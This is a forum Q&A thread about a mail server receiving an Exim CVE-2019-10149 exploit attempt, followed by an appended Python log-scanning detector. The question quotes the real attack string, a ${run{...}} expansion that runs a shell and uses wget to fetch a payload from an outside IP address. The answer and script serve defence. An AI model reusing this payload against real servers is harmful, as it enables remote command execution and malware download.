attack via executable line after plus sign in email address

3

1

I operate my own mail server and from time to time, people send spam or mysterious stuff to the root account. Recently, I got an empty mail, which was addressed to:

root+${run{x2Fbinx2Fsht-ctx22wgetx20199.204.214.40x2fsbzx2f193.150.14.196x22}}@mydomain.tld

The second IP address in that string seems to be owned by the same hosting service which I rent my server from. The run and wget look very suspicious to me but I found nothing about such an attack on the Internet.

According to the server's mail log, that mail was sent from 148.72.206.111. However, the From field was set to root@sab.com.

Does anyone know what this means?

Ilka31415

Posted 2019-07-19T10:52:02.690

Reputation: 43

Answers

3

This is an attempt to exploit a recently discovered bug in the Exim4 SMTP server (v4.87 to v4.91), which would allow remote command execution as Exim would expand ${variable} substitutions in certain places that it really was not supposed to. (This syntax is broadly used in the main Exim configuration file.)

The bug is known as CVE-2019-10149 (it doesn't have a trademark name or logo yet). If you were using Exim4 from your distribution, you would already have received the patches. Since you're using Postfix, it doesn't affect you in the first place.

(That said, even in Postfix the parameter after the + is frequently used as part of a command line, e.g. when invoking Procmail. I would probably recommend doing a few tests against your own server to see how it handles things like someuser+$(blah)@ or someuser+`blah`@.)

user1686

Posted 2019-07-19T10:52:02.690

Reputation: 283 655
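Following the answer's suggestion to check how your own server treats the part after the plus sign, here is an added defender-side example (not from the answer or from the Exim/Postfix projects) that scans recipient addresses from mail log lines and flags the two shapes discussed: Exim `${...}` expansion syntax (the CVE-2019-10149 vector) and shell substitution like `$(...)` or backticks. It assumes Postfix-style `to=<...>` log entries; the log lines and their addresses are constructed samples.

```python
import re

# Suspicious content in the "+extension" of a recipient local-part:
# Exim string-expansion syntax (the CVE-2019-10149 vector) and shell
# command substitution (the forms the answer suggests testing with).
EXIM_EXPANSION = re.compile(r"\$\{")      # ${run{...}}, ${substr{...}}, ...
SHELL_SUBST = re.compile(r"\$\(|`")       # $(cmd) or `cmd`
SAFE_EXTENSION = re.compile(r"^[A-Za-z0-9._-]{0,64}$")  # what a legitimate +tag looks like
RCPT_RE = re.compile(r"to=<([^>]+)>")     # recipient field in a Postfix log line

def split_recipient(addr):
    """Split user+ext@domain into (user, ext, domain); ext is '' when absent."""
    local, sep, domain = addr.rpartition("@")
    if not sep:
        raise ValueError("not an address: %r" % addr)
    user, _, ext = local.partition("+")
    return user, ext, domain

def classify_extension(ext):
    """Return the list of reasons an extension looks dangerous ([] if benign)."""
    reasons = []
    if EXIM_EXPANSION.search(ext):
        reasons.append("exim-expansion")
    if SHELL_SUBST.search(ext):
        reasons.append("shell-substitution")
    if not reasons and not SAFE_EXTENSION.match(ext):
        reasons.append("unexpected-characters")
    return reasons

def scan_log(lines):
    """Return (recipient, reasons) for every logged recipient whose +extension is suspect."""
    findings = []
    for line in lines:
        for addr in RCPT_RE.findall(line):
            try:
                _, ext, _ = split_recipient(addr)
            except ValueError:
                continue  # malformed recipient, nothing to classify
            reasons = classify_extension(ext)
            if reasons:
                findings.append((addr, reasons))
    return findings

# Constructed Postfix-style log lines (placeholder payload, not real data).
SAMPLE_LOG = [
    "Jul 19 10:52:03 mx postfix/local[1240]: ABC123: to=<root+${run{x2Fbinx2Fsh}}@mydomain.tld>, relay=local, status=sent",
    "Jul 19 10:52:04 mx postfix/local[1241]: DEF456: to=<alice+newsletter@mydomain.tld>, relay=local, status=sent",
    "Jul 19 10:52:05 mx postfix/local[1242]: GHI789: to=<bob+$(id)@mydomain.tld>, relay=local, status=bounced",
]
```

Running `scan_log(SAMPLE_LOG)` flags the first and third recipients and leaves `alice+newsletter` alone; the same checks can be used to reject such extensions before anything hands them to a delivery command.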